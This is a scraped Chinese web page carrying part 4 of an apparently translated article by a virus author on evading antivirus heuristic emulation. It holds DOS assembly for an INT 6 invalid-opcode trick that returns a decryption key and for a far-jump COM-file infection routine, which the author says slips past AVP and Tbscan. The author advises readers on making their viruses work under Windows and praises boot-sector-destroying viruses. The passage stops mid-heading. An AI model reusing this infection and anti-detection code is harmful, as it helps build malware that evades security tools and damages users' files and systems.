对抗启发式代码仿真检测技术分析(4)_MySQL数据库_黑客防线网安服务器维护基地--Powered by WWW.RONGSEN.COM.CN

对抗启发式代码仿真检测技术分析(4)

作者:黑客防线网安MYSQL维护基地 来源:黑客防线网安MYSQL维护基地 浏览次数:0

本篇关键词:分析仿真代码启发
黑客防线网安网讯:   这是非常有效的一种手段,在我的测试中仅F-PORT v2.27 /PARANOID 能检测出了它,尽管它只能运行在intel的CPU上。在Cyrix 或者 AMD 处理器上是不能使用这中方法的。因此你virus如果运行则...
   这是非常有效的一种手段在我的测试中仅F-PORT v2.27 /PARANOID 能检测出了它尽管它只能运行在intel的CPU上在Cyrix 或者 AMD 处理器上是不能使用这中方法的因此你virus如果运行则将崩溃。:- (如果你想看一下的病毒情况,你可以查找我写 PR.H! virus)
  4 通过INT 6 的手段:
  cpu 如果发现无效指令运行则int 6h 中断总是会被调用的。这个方法非常相似于INT 1 中断的手段。我们设置一个INT 6h中断的handler,然后执行一个条我们故意使用的无效指令,同时返回解密密钥。如果我们不想陷入无穷尽的循环当中,就要修改返回时的偏移。
  
      mov ax, 3506h ;get int vector 6, so we can restore it later
  int 21h ;not really necessary, but a little bit saver
  mov int6_segm, es
  mov int6_offs, bx
  mov ax, 2506h ;set int vector 6 to our own routine
  mov dx, offset int6_handler
  int 21h
  dw 0FFFFh ;an invalid opcode, will call our int 6
  mov decrypt_key, ax ;handler, which returns the decryption key
  mov ax, 2506h ;restore the original int 6 handler
  mov dx, cs:int6_offs
  mov ds, cs:int6_segm
  int 21h
  [...]
  int6_handler:
  mov ax, key
  mov bx, sp
  add word ptr ss:[bx], 2 ;modify return address - very important!
  ;2 is the size of our invalid opcode.
  iret  请记住,这一方式并不能工作在window系统下的dos窗口程序中,因为window会率先截获一个无效的opcode,并给出错误消息(thanks to Z0MBiE for that tip)。所以如果你想使你的DOS virus兼容window,那么不要用此方法,尽管破坏引导区的virus实在是很美妙的。
  5 感染COM文件及FAR JUMP方式:
  我不喜欢delta offsets方式,所有我开始尝试用far jump方式来感染com文件(当然,还是要加上些代码用来重定位的):
  
      mov ax, cs ;Relocate far Jump
  add [offset com_seg], ax
  JMP SHORT $+2 ;Clear prefetch queue
  db 0EAh ;OP-Code far Jump
  dw offset start ;Offset
  com_seg dw 0 ;Segment (length of com file in paragraphs)
  ;pad filesize to even paragraph!  这段代码可以非常稳定地运行,我很惊讶,这种感染方式可以阻止AVP和Tbscan的来发现文件已被感染的检测方式。如果想看全部的virus欺骗技巧,再一次提醒您,可以查找我写 PR.H!- virus。
  6 初始化寄存器方
    黑客防线网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show-7854-1.html
网站维护教程更新时间:2012-03-20 01:45:43  【打印此页】  【关闭
我要申请本站N点 | 黑客防线官网 |  
专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。黑客防线网安服务器维护基地招商进行中!QQ:29769479

footer  footer  footer  footer